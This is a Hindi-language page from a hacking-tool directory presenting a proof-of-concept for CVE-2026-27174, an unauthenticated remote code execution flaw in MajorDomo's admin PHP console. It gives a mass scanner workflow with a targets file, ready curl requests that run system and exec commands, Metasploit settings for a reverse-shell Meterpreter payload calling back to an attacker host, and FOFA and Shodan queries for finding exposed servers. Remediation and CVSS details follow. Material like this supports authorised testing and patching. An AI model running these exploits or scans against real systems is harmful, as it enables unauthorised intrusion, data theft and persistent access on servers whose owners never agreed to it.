Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
majordomo-CVE-2026-27174-poc — CVE-2026-27174 - एडमिन पैनल की PHP कंसोल सुविधा के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/maxmnml/majordomo-cve-2026-27174-poc
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmaxmnml/majordomo-cve-2026-27174-poc

majordomo-CVE-2026-27174-poc

CVE-2026-27174 - एडमिन पैनल की PHP कंसोल सुविधा के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
5 महीने पहलेअभी तक समीक्षित नहीं

majordomo-CVE-2026-27174-poc

MajorDomo (Major Domestic Module) के एडमिन पैनल की PHP कंसोल सुविधा के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन (unauthenticated remote code execution) का शोषण करने वाला एक proof-of-concept।

भेद्यता

MajorDoMo का एडमिन पैनल /admin.php के माध्यम से एक PHP मूल्यांकन कंसोल प्रदर्शित करता है। panel.class.php में प्रमाणीकरण रीडायरेक्ट के बाद exit की कमी के कारण, AJAX हैंडलर inc_panel_ajax.php को बिना किसी शर्त के शामिल किया जाता है — जिससे इसका eval() किसी भी बिना प्रमाणीकरण वाले HTTP अनुरोध के लिए सुलभ हो जाता है।

एक हमलावर केवल एक GET अनुरोध से मनमाना PHP कोड निष्पादित कर सकता है, जिसके लिए न तो किसी क्रेडेंशियल की आवश्यकता होती है, न ही पूर्व पहुँच की, और न ही पीड़ित की कोई इंटरैक्शन।

प्रभावित संस्करण

  • फरवरी 18, 2026 के पैच से पहले के सभी MajorDomo संस्करण।

डिटेक्शन स्कैनर

scan.py एक गैर-विनाशकारी मल्टी-थ्रेडेड स्कैनर है जो CVE-2026-27174 के प्रति संवेदनशील होस्टों का पता लगाता है बिना कोई हानिकारक पेलोड निष्पादित किए।

यह कैसे काम करता है

स्कैनर प्रति लक्ष्य तीन अनुक्रमिक चरणों में कार्य करता है:

root@kitploit:~
Phase 1 — RCE Confirmation
  └─ Sends: echo 'random_marker';
  └─ Checks: marker is reflected in the response body
  └─ Confirms: eval() is reachable without authentication

Phase 2 — PHP Sandbox Profiling
  └─ Sends: echo 'marker:' . ini_get('disable_functions');
  └─ Extracts: list of disabled PHP functions on the server

Phase 3 — OS Execution Surface
  └─ Probes: system, exec, shell_exec, passthru via function_exists()
  └─ Classifies: impact level as HIGH or MEDIUM

प्रत्येक अनुरोध के लिए एक यादृच्छिक अल्फान्यूमेरिक मार्कर उत्पन्न किया जाता है, ताकि कैशिंग, WAF, या प्रतिक्रिया प्रदूषण से उत्पन्न गलत सकारात्मक परिणामों (false positives) से बचा जा सके।

उपयोग

आवश्यकताएँ

root@kitploit:~
pip install requests

1. टारगेट्स फ़ाइल तैयार करें

एक targets.txt फ़ाइल बनाएँ, जिसमें प्रत्येक पंक्ति में एक IP:PORT हो:

root@kitploit:~
192.168.1.10:8080
10.0.0.5:80
10.0.0.12:443
# lines starting with # are ignored
# only IP:PORT format is accepted

2. स्कैनर चलाएँ

root@kitploit:~
python3 scan.py targets.txt

आउटपुट

root@kitploit:~
[+] RCE PHP CONFIRMED -> http://192.168.1.10:8080/admin.php
[-] Not vulnerable -> 10.0.0.5:80

[+] Vulnerable targets exported to results.json

results.json

जब कम से कम एक संवेदनशील होस्ट मिल जाता है तो यह फ़ाइल स्वचालित रूप से उत्पन्न होती है:

root@kitploit:~
[
    {
        "target": "192.168.1.10:8080",
        "url": "http://192.168.1.10:8080/admin.php",
        "rce_php": true,
        "disable_functions": "popen,pclose,proc_open",
        "system_functions_available": ["system", "exec"],
        "impact_level": "HIGH"
    }
]

शोषण

result.json फ़ाइल में system_functions_available फ़ील्ड के परिणाम के आधार पर, हम system फ़ंक्शन(ों) का उपयोग करके RCE का शोषण करने के लिए एक GET अनुरोध तैयार कर सकते हैं:

root@kitploit:~
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+exec('id');
#or
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+system('id');

uid=33(www-data) gid=33(www-data) groups=33(www-data)

स्वचालन

Metasploit मॉड्यूल:

root@kitploit:~
msfconsole
use exploit/multi/http/majordomo_console_eval_rce
set RHOSTS 192.168.1.10
set RPORT 8080
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 172.17.0.1
check #Verify it returns Vulnerable
run #Verify a Meterpreter session opens as www-data

वास्तविक दुनिया में

FOFA:

root@kitploit:~
title="MajorDomoSL"

SHODAN:

root@kitploit:~
http.title:"MajorDomoSL"

प्रभाव

एक दूरस्थ बिना प्रमाणीकरण वाला हमलावर निम्न कार्य कर सकता है:

  • सर्वर पर मनमाना PHP कोड निष्पादित करना
  • संवेदनशील फ़ाइलें पढ़ना (/etc/passwd, कॉन्फ़िगरेशन फ़ाइलें, क्रेडेंशियल)
  • स्थायी पहुँच के लिए PHP वेबशेल लिखना
  • यदि PHP फ़ंक्शन system, exec, shell_exec, या passthru अक्षम नहीं हैं तो OS-स्तरीय कमांड निष्पादन की ओर बढ़ना

वास्तविक प्रभाव सर्वर की disable_functions PHP कॉन्फ़िगरेशन पर निर्भर करता है:

CVSS 4.0 - 9.3 क्रिटिकल — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS 3.1 - 9.8 क्रिटिकल — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

उपचार एवं शमन

MajorDomo (Major Domestic Module) के नवीनतम संस्करण में अपडेट करें।

नियंत्रणRCE रोकता हैOS निष्पादन रोकता है

संदर्भ

https://chocapikk.com/posts/2026/majordomo-revisited

https://nvd.nist.gov/vuln/detail/CVE-2026-27174

https://github.com/sergejey/majordomo/pull/1177

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।

टूल डाउनलोड करें
फ़ील्डविवरण
targetस्कैन किया गया IP:PORT
urlवह पूर्ण URL जहाँ RCE की पुष्टि हुई
rce_phpPHP कोड निष्पादन की पुष्टि (परिणामों में हमेशा true)
disable_functionsसर्वर की disable_functions PHP सेटिंग (null यदि खाली हो)
system_functions_availableOS निष्पादन फ़ंक्शन जिन्हें हमलावर कॉल कर सकता है
impact_levelHIGH (OS exec सुलभ) या MEDIUM (केवल PHP RCE)
परिदृश्यप्रभाव स्तरविवरण
कोई disable_functions नहींक्रिटिकलपूर्ण OS कमांड निष्पादन
आंशिक प्रतिबंधउच्चPHP RCE + आंशिक OS निष्पादन
disable_functions सभी exec को ब्लॉक करता हैमध्यमकेवल PHP RCE (फ़ाइल पढ़ना/लिखना, डेटा निष्कासन)
फरवरी 18, 2026 का पैच लागू करें✅✅
/admin.php पर फ़ायरवॉल/IP अनुमतिसूची✅✅
disable_functions हार्डनिंग❌✅